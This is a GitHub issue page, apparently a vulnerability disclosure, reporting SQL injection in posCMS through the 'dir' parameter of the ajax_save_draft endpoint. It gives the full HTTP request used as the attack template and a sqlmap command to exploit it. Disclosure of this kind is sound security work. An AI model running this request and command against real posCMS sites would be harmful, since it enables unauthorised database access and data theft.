Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

posCMS sql injection via dir parameter #3

Open
howchen opened this issue Aug 31, 2018 · 0 comments
Open

posCMS sql injection via dir parameter #3

howchen opened this issue Aug 31, 2018 · 0 comments

Comments

@howchen
Copy link
Owner

howchen commented Aug 31, 2018

--- target.txt

POST /index.php?s=member&c=api&m=ajax_save_draft&dir=photo HTTP/1.1
Host: localhost:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8899/admin.php?s=photo&c=home&m=add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 259
Connection: close

page=&action=back&dr_id=&dr_module=photo&data%5Btitle%5D=test&data%5Bthumb%5D=2&data%5Bkeywords%5D=&data%5Bdescription%5D=test&data%5Bauthor%5D=admin&data%5Binputtime%5D=1535678500&data%5Bupdatetime%5D=1535678500&data%5Binputip%5D=127.0.0.1&data%5Bstatus%5D=9

execute the commands below:
python sqlmap.py -r target.txt -p dir

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant